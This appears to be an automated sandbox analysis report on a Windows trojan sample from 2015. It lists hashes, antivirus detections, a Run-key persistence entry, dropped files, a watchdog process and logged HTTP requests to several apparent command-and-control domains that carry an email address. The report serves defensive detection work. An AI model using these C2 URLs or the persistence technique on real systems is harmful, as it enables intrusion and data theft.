Analysis Date: 2015-10-13 11:32:24
MD5: 6961abdd516e904a3e3a3620545e3e32
SHA1: f1ed070c1b536ef1c7d196776447f6eb017a8f54

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 457ef9f12870badaf5e12b3667cb25d9 sha1: 2269f2b1d19eafc170619ede447c60b83ad61557 size: 297984
Section .rdata: md5: afcbf682181cac4ab898bdc2a604b20a sha1: 703aa426b3b3c5ca915a85874159f1f45da69837 size: 33280
Section .data: md5: cac2e3324b53e470d5f74e7ac4329db7 sha1: c79db008c53708a05fed20178cdc5f5498f40848 size: 105472
Timestamp: 2014-10-30 09:49:44
Packer: Microsoft Visual C++ ?.?
PEhash: 04911ea88b5f3876a52fce552affd3f7cb1ec860
IMPhash: 10316e882f2bca018977163762ac7a6f
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!6961ABDD516E
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004cb2771 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV F-Secure: Gen:Variant.Symmi.22722

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Secure Background ➝ C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.gwfpg
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\iohmtkier\endzmqkomp.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe"

Network Details:

HTTP GET: http://historyadvance.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
HTTP GET: http://strangestranger.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
HTTP GET: http://collegeproblem.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
HTTP GET: http://strangeanimal.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 195.22.26.254:80
Flows TCP: 192.168.1.1:1032 ➝ 98.139.135.129:80
Flows TCP: 192.168.1.1:1033 ➝ 208.100.26.234:80
Flows TCP: 192.168.1.1:1034 ➝ 199.83.128.18:80
